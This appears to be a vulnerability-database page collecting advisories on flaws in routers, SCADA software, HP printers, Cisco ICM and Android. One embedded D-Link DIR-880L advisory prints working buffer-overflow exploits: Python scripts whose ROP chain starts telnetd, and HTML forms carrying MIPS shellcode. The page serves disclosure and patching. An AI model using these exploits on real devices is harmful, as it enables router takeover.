oxas-adv-2024-0005 OX App Suite Security Advisory OXAS-ADV-2024-0005 2024-07-08T00:00:00+02:00 2024-09-09T00:00:00+00:00
oxdc-adv-2024-0001 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0001 2024-09-02T00:00:00+02:00 2024-09-06T00:00:00+00:00
oxas-adv-2024-0004 OX App Suite Security Advisory OXAS-ADV-2024-0004 2024-06-13T00:00:00+02:00 2024-08-19T00:00:00+00:00
oxas-adv-2024-0003 OX App Suite Security Advisory OXAS-ADV-2024-0003 2024-04-24T00:00:00+02:00 2024-08-19T00:00:00+00:00
oxas-adv-2024-0002 OX App Suite Security Advisory OXAS-ADV-2024-0002 2024-03-06T00:00:00+01:00 2024-05-06T00:00:00+00:00
oxas-adv-2024-0001 OX App Suite Security Advisory OXAS-ADV-2024-0001 2024-02-08T00:00:00+01:00 2024-04-25T00:00:00+00:00
oxas-adv-2023-0007 OX App Suite Security Advisory OXAS-ADV-2023-0007 2023-12-11T00:00:00+01:00 2024-02-16T00:00:00+00:00
oxas-adv-2023-0006 OX App Suite Security Advisory OXAS-ADV-2023-0006 2023-09-25T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0005 OX App Suite Security Advisory OXAS-ADV-2023-0005 2023-09-19T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0004 OX App Suite Security Advisory OXAS-ADV-2023-0004 2023-08-01T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0003 OX App Suite Security Advisory OXAS-ADV-2023-0003 2023-05-02T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0002 OX App Suite Security Advisory OXAS-ADV-2023-0002 2023-03-20T00:00:00+01:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0001 OX App Suite Security Advisory OXAS-ADV-2023-0001 2023-02-06T00:00:00+01:00 2024-01-22T00:00:00+00:00
oxas-adv-2022-0002 OX App Suite Security Advisory OXAS-ADV-2022-0002 2022-11-02T00:00:00+01:00 2024-01-22T00:00:00+00:00
oxas-adv-2022-0001 OX App Suite Security Advisory OXAS-ADV-2022-0001 2022-08-10T00:00:00+02:00 2024-01-22T00:00:00+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
var-202411-1650 D-LINK DI-8400 v16.07.26A1 was discovered to contain multiple remote command execution (RCE) vulnerabilities in the msp_info_htm function via the flag and cmd parameters. D-LINK DI-8400 is a router device from D-Link, USA, used for home and small business network connections. Remote attackers can exploit this vulnerability to execute arbitrary commands
var-202411-1640 Linksys E3000 is a powerful dual-band Wireless-N router from Linksys, an American company. There is a security vulnerability in diag_ping_start of Linksys E3000. A remote attacker can use this vulnerability to submit special requests and execute arbitrary commands in the context of the application.
var-202411-0543 A vulnerability has been identified in SIMATIC S7-PLCSIM V16 (All versions), SIMATIC S7-PLCSIM V17 (All versions), SIMATIC STEP 7 Safety V16 (All versions), SIMATIC STEP 7 Safety V17 (All versions < V17 Update 8), SIMATIC STEP 7 Safety V18 (All versions < V18 Update 5), SIMATIC STEP 7 V16 (All versions), SIMATIC STEP 7 V17 (All versions < V17 Update 8), SIMATIC STEP 7 V18 (All versions < V18 Update 5), SIMATIC WinCC Unified V16 (All versions), SIMATIC WinCC Unified V17 (All versions < V17 Update 8), SIMATIC WinCC Unified V18 (All versions < V18 Update 5), SIMATIC WinCC V16 (All versions), SIMATIC WinCC V17 (All versions < V17 Update 8), SIMATIC WinCC V18 (All versions < V18 Update 5), SIMOCODE ES V16 (All versions), SIMOCODE ES V17 (All versions < V17 Update 8), SIMOCODE ES V18 (All versions), SIMOTION SCOUT TIA V5.4 SP1 (All versions), SIMOTION SCOUT TIA V5.4 SP3 (All versions), SIMOTION SCOUT TIA V5.5 SP1 (All versions), SINAMICS Startdrive V16 (All versions), SINAMICS Startdrive V17 (All versions), SINAMICS Startdrive V18 (All versions), SIRIUS Safety ES V17 (All versions < V17 Update 8), SIRIUS Safety ES V18 (All versions), SIRIUS Soft Starter ES V17 (All versions < V17 Update 8), SIRIUS Soft Starter ES V18 (All versions), TIA Portal Cloud V16 (All versions), TIA Portal Cloud V17 (All versions < V4.6.0.1), TIA Portal Cloud V18 (All versions < V4.6.1.0). Affected products do not properly sanitize user-controllable input when parsing user settings. This could allow an attacker to cause a type confusion and execute arbitrary code within the affected application. SIMATIC S7-PLCSIM simulates S7-1200, S7-1500 and some other PLC derivatives, shipped as part of SIMATIC STEP 7. SIMATIC step7 (TIA Portal) is an engineering software for configuring and programming SIMATIC controllers. simmocode ES is the core software package for simmocode pro configuration, commissioning, operation and diagnostics. SINAMICS Startdrive commissioning software is the engineering tool for integrating SINAMICS drives in TIA Portal. TIA Portal is a PC software that provides the full range of Siemens digital automation services from digital planning and integrated engineering to transparent operation. TIA Portal Cloud makes it possible to use the main package and main option package of TIA Portal in a virtualized environment
var-201507-0645 D-Link is an internationally renowned provider of network equipment and solutions, including a variety of router equipment. D-Link is a D-Link company dedicated to the research, development, production and marketing of local area networks, broadband networks, wireless networks, voice networks and related network equipment. A buffer overflow vulnerability exists in D-Link due to the program not performing correct boundary checks on user-submitted input. An attacker could use this vulnerability to execute arbitrary code in the context of an affected device and may also cause a denial of service. The following products are affected: D-Link Ethernet Broadband Router. Failed exploits may result in denial-of-service conditions. ## Advisory Information Title: DIR-880L Buffer overflows in authenticatio and HNAP functionalities. Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR-880L -- Wireless AC1900 Dual-Band Gigabit Cloud Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 2 security issues in DIR-880 firmware which allows an attacker to exploit buffer overflows in authentication and HNAP functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. Also this exploit needs to be run atleast 200-500 times to bypass ASLR on ARM based devices. ## Details Buffer overflow in HNAP ---------------------------------------------------------------------------------------------------------------------- import socket import struct #Currently the address of exit function in libraray used as $PC buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220 buf+= "\r\n" + "1\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- Buffer overflow in auth ---------------------------------------------------------------------------------------------------------------------- import socket import struct buf = "GET /webfa_authentication.cgi?id=" buf+="A"*408 buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack buf+="sh;#"+"CCCC"+"DDDD" #R0-R2 buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG" #R3 with system address and R4 and R5 with junk values buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley (samhuntley84@gmail.com) . ## Details # Ping buffer oberflow ---------------------------------------------------------------------------------------------------------------------- <!-- reboot shellcode Big Endian MIPS--> <html> <body> <form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/ping_response.cgi"> <input type="text" id="html_response_page" name="html_response_page" value="tools_vct.asp&html_response_return_page=tools_vct.asp&action=ping_test&ping_ipaddr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%2A%BF%99%F4%2A%C1%1C%30AAAA%2A%BF%8F%04CCCC%2A%BC%9B%9CEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE%2A%BC%BD%90FFFFFFFFFFFFFFFF%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0c&ping=ping"></td> <input type=submit value="submit"> </form> </body> </html> ---------------------------------------------------------------------------------------------------------------------- # Send email buffer overflow ---------------------------------------------------------------------------------------------------------------------- <!-- reboot shellcode Big Endian MIPS--> <html> <body> <form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/send_log_email.cgi"> <input type="text" id="auth_active" name="auth_active" value="testy)%3b&log_email_from=test@test.com&auth_acname=sweetBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBIIII%2A%BF%99%F4%2A%C1%1C%30FFFF%2A%BF%8F%04DDDDCCCCBBBB%2A%BC%9B%9CCCC&auth_passwd=test1)&log_email_server=mail.google.com%3breboat%3b%23%23testAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&log_email_port=25&log_email_sender=ses@gmail.com%3brebolt%3b%23%23teYYYY%2A%BC%BD%90AAAAAAAAAAAAtest%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0cAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&model_name=test&action=send_log_email&test=test"></td> <input type=submit value="submit"> </form> </body> </html> ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline
var-201807-0341 ABB Panel Builder 800 all versions has an improper input validation vulnerability which may allow an attacker to insert and run arbitrary code on a computer where the affected product is used. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of the IpAddress parameters of the ABB BeMMS OPC Driver. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code under the context of an administrator. ABB Panel Builder 800 is a web-based HMI (Human Machine Interface) system from ABB, Switzerland. Failed exploit attempts will result in denial-of-service conditions
var-202411-1422 D-Link DI-8200 16.07.26A1 is vulnerable to remote command execution in the msp_info_htm function via the flag parameter and cmd parameter. D-Link Systems, Inc. of di-8200 Firmware contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. D-Link DI-8200 is an enterprise-class router from D-Link, a Chinese company. No detailed vulnerability details are currently available
var-202411-1539 D-LINK DI-8003 v16.07.26A1 was discovered to contain a buffer overflow via the host_ip parameter in the ipsec_road_asp function. D-Link Systems, Inc. of di-8003 An out-of-bounds write vulnerability exists in firmware.Service operation interruption (DoS) It may be in a state. D-LINK DI-8003 is a router product produced by D-LINK. No detailed vulnerability details are currently provided
var-201103-0371 SAP Crystal Reports Server is a complete reporting solution for creating, managing, and delivering reports through the web or embedded enterprise applications. There is an input validation error in SAP Crystal Reports Server. The input passed to aa-open-inlist.jsp via the \"url\", \"sWindow\", \"BEGIN_DATE\", \"END_DATE\", \"CURRENT_DATE\" and \"CURRENT_SLICE\" parameters is missing before returning to the user. Filtering can lead to cross-site scripting attacks
var-202410-3364 In TP-Link TL-WDR7660 v1.0, the guestRuleJsonToBin function handles the parameter string name without checking it, which can lead to stack overflow vulnerabilities. TP-LINK TL-WDR7660 is a Gigabit router from TP-LINK of China. TP-LINK TL-WDR7660 version 1.0 has a buffer overflow vulnerability. Attackers can exploit this vulnerability to execute arbitrary code on the system or cause a denial of service
var-202411-1441 D-LINK DI-8003 v16.07.16A1 was discovered to contain a buffer overflow via the notify parameter in the arp_sys_asp function. D-Link Systems, Inc. of di-8003 An out-of-bounds write vulnerability exists in firmware.Service operation interruption (DoS) It may be in a state. D-Link DI-8400 is a wireless router from D-Link, a Chinese company. D-Link DI-8400 arp_sys_asp has a buffer overflow vulnerability, which can be exploited by remote attackers to submit special requests, causing the service program to crash or execute arbitrary code in the context of the application
var-201112-0173 The default configuration of the HP CM8060 Color MFP with Edgeline; Color LaserJet 3xxx, 4xxx, 5550, 9500, CMxxxx, CPxxxx, and Enterprise CPxxxx; Digital Sender 9200c and 9250c; LaserJet 4xxx, 5200, 90xx, Mxxxx, and Pxxxx; and LaserJet Enterprise 500 color M551, 600, M4555 MFP, and P3015 enables the Remote Firmware Update (RFU) setting, which allows remote attackers to execute arbitrary code by using a session on TCP port 9100 to upload a crafted firmware update. A vulnerability in certain Hewlett-Packard devices could allow a remote attacker to install unauthorized firmware on an affected system. HP Printers and Digital Senders are prone to a security-bypass vulnerability. The unauthorized firmware could also cause a Denial of Service to the device. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03102449 Version: 3 HPSBPI02728 SSRT100692 rev.3 - Certain HP Printers and HP Digital Senders, Remote Firmware Update Enabled by Default NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2011-11-30 Last Updated: 2012-01-09 Potential Security Impact: Remote firmware update enabled by default Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with certain HP printers and HP digital senders. References: CVE-2011-4161 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Please refer to the RESOLUTION below for a list of impacted products. A firmware update can be sent remotely to port 9100 without authentication. RESOLUTION The following steps can be taken to avoid unauthorized firmware updates: Update the firmware to a version that implements code signing Disable the Remote Firmware Update The code signing feature verifies that firmware updates are properly signed. This will prevent the installation of invalid firmware updates. Note: A firmware update may be required to allow the RFU to be disabled or to implement code signing. Code signing is not available on all the affected devices. Please refer to the following table. Firmware updates for any of the products can also be downloaded as follows. Browse to www.hp.com/go/support then: Select "Drivers & Software" Enter the product name listed in the table above into the search field Click on "Search" If the search returns a list of products click on the appropriate product Under "Select operating system" click on "Cross operating system (BIOS, Firmware, Diagnostics, etc.)" If the "Cross operating system ..." link is not present, select any Windows operating system from the list. Select the appropriate firmware update under "Firmware" HISTORY Version:1 (rev.1) - 30 November 2011 Initial release Version:2 (rev.2) - 23 December 2011 Code signing firmware available Version:3 (rev.3) - 9 January 2012 Combined tables Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAk8KykcACgkQ4B86/C0qfVl09ACg1m3AQDGq/VzvFgb4j6bj3fJU VnkAoO9oPSjyrVB07qLIBpcXALxLRRRg =mXzy -----END PGP SIGNATURE----- . However, the information is applicable to all the devices listed above. This revision, version 6, of the Security Bulletin announces the availability of firmware updates for additional devices
var-201011-0225 Multiple stack-based buffer overflows in agent.exe in Setup Manager in Cisco Intelligent Contact Manager (ICM) before 7.0 allow remote attackers to execute arbitrary code via a long parameter in a (1) HandleUpgradeAll, (2) AgentUpgrade, (3) HandleQueryNodeInfoReq, or (4) HandleUpgradeTrace TCP packet, aka Bug IDs CSCti45698, CSCti45715, CSCti45726, and CSCti46164. The problem is Bug ID CSCti45698 , CSCti45715 , CSCti45726 ,and CSCti46164 It is a problem.By a third party (1) HandleUpgradeAll , (2) AgentUpgrade , (3) HandleQueryNodeInfoReq , (4) HandleUpgradeTrace TCP Arbitrary code could be executed via overly long parameters in the packet. Authentication is not required to exploit this vulnerability. The flaw exists within the Agent.exe component which listens by default on TCP port 40078. When processing the HandleUpgradeAll packet type an unchecked copy of user supplied data is performed into a stack-based buffer of a controlled size. Successful exploitation of this vulnerability leads to remote code execution under the context of the SYSTEM user. This may result in a compromise of the underlying system. Failed attempts may lead to a denial-of-service condition. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta. Join the beta: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Cisco Intelligent Contact Manager Setup Manager "Agent.exe" Multiple Vulnerabilities SECUNIA ADVISORY ID: SA42146 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42146/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42146 RELEASE DATE: 2010-11-09 DISCUSS ADVISORY: http://secunia.com/advisories/42146/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/42146/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=42146 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Some vulnerabilities have been reported in Cisco Intelligent Contact Manager Setup Manager, which can be exploited by malicious people to compromise a vulnerable system. 1) A boundary error within Agent.exe when handling the "HandleUpgradeAll" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 2) A boundary error within Agent.exe when handling the "AgentUpgrade" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 3) A boundary error within Agent.exe when handling the "HandleQueryNodeInfoReq" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 4) A boundary error within Agent.exe when handling the "HandleUpgradeTrace" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. Please see the vendor's advisory for the list of affected versions. SOLUTION: The vendor recommends to delete the Agent.exe file or restrict network access to the affected service. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: sb, reported via ZDI. ORIGINAL ADVISORY: Cisco: http://tools.cisco.com/security/center/viewAlert.x?alertId=21726 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-232/ http://www.zerodayinitiative.com/advisories/ZDI-10-233/ http://www.zerodayinitiative.com/advisories/ZDI-10-234/ http://www.zerodayinitiative.com/advisories/ZDI-10-235/ OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ZDI-10-232: Cisco ICM Setup Manager Agent.exe HandleUpgradeAll Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-232 November 7, 2010 -- CVE ID: CVE-2010-3040 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Cisco -- Affected Products: Cisco Unified Intelligent Contact Management -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9915. -- Vendor Response: Cisco has issued an update to correct this vulnerability. More details can be found at: http://tools.cisco.com/security/center/viewAlert.x?alertId=21726 -- Disclosure Timeline: 2010-06-01 - Vulnerability reported to vendor 2010-11-07 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * sb -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
var-202407-0046 mySCADA myPRO uses a hard-coded password which could allow an attacker to remotely execute code on the affected device. Authentication is not required to exploit this vulnerability.The specific flaw exists within the telnet service, which listens on TCP port 5005 by default. The issue results from the use of hard-coded credentials. mySCADA myPRO is an application software. myPRO is a professional HMI/SCADA system designed primarily for visualization and control of industrial processes
var-202410-2013 In mm_GetMobileIdIndexForNsUpdate of mm_GmmPduCodec.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Google of Android Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Google Pixel is a smartphone produced by Google in the United States. Google Pixel has a buffer overflow vulnerability. The vulnerability is caused by incorrect boundary checking in mm_GetMobileIdIndexForNsUpdate of mm_GmmPduCodec.c. Attackers can exploit this vulnerability to cause out-of-bounds write
var-201105-0156 Multiple buffer overflows in the ISSymbol ActiveX control in ISSymbol.ocx 61.6.0.0 and 301.1009.2904.0 in the ISSymbol virtual machine, as distributed in Advantech Studio 6.1 SP6 61.6.01.05, InduSoft Web Studio before 7.0+SP1, and InduSoft Thin Client 7.0, allow remote attackers to execute arbitrary code via a long (1) InternationalOrder, (2) InternationalSeparator, or (3) LogFileName property value; or (4) a long bstrFileName argument to the OpenScreen method. Overly long to method bstrFileName argument. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Indusoft Thin Client. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within ISSymbol.ocx ActiveX component. When an overly large string is passed as the 'InternationalOrder' parameter, a heap overflow occurs. This vulnerability can be leveraged to execute code under the context of the user running the browser. InduSoft Web Studio is a powerful and complete graphics control software that includes the various functional modules required to develop Human Machine Interface (HMI), Management Control, Data Acquisition System (SCADA) and embedded control. The Advantech Studio ISSymbol ActiveX control handles boundary errors in the \"InternationalSeparator\" property. The Advantech Studio ISSymbol ActiveX control is prone to multiple buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied input. Failed exploit attempts will likely result in denial-of-service conditions. Advantech Studio 6.1 SP6 Build 61.6.01.05 is vulnerable; other versions may also be affected. There are multiple buffer overflow vulnerabilities in InduSoft ISSymbol ActiveX control 6.1 SP6 Build 61.6.01.05 (ISSymbol.ocx 61.6.0.0) and other versions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-155 : InduSoft Thin Client ISSymbol InternationalOrder Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-155 August 22, 2012 - -- CVE ID: CVE-2011-0340 - -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P - -- Affected Vendors: Indusoft - -- Affected Products: Indusoft WebStudio - -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12505. - -- Vendor Response: Indusoft has issued an update to correct this vulnerability. More details can be found at: http://www.indusoft.com/hotfixes/hotfixes.php - -- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-08-22 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * Alexander Gavrun - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBUDUFHFVtgMGTo1scAQJ1Twf8C0MRiovFv7JVpAgg+lOYT3HW7MYdUKAx /I+4hvkGyeKKCCkvIOkx0y7eSdwp4paxVZAd0WYTfsG0K1h+bBngt6m+3Nicx0Iq YuqyOluJTW4ymXUSwvX8MZ39709DQXEl5yp9JvIX+Dc4WY7TKauGYKIfbb/VRMQq VYgQPhnlv8laGORlVREpu+yrOPdYLbQSucewpaLXd4b8uw1+Kmurjepiil5vxqPD G3fD23i1jGrbg6aX0AlvECo1M12alERft7wjtI21D7VP7G3uBYwiAJ8jxutavMQY Yf5K6rzdbx+96MuFco7aYB49GBQDpMYvWeWur3YEv1GqR7bSotpO1Q== =Yxrq -----END PGP SIGNATURE-----
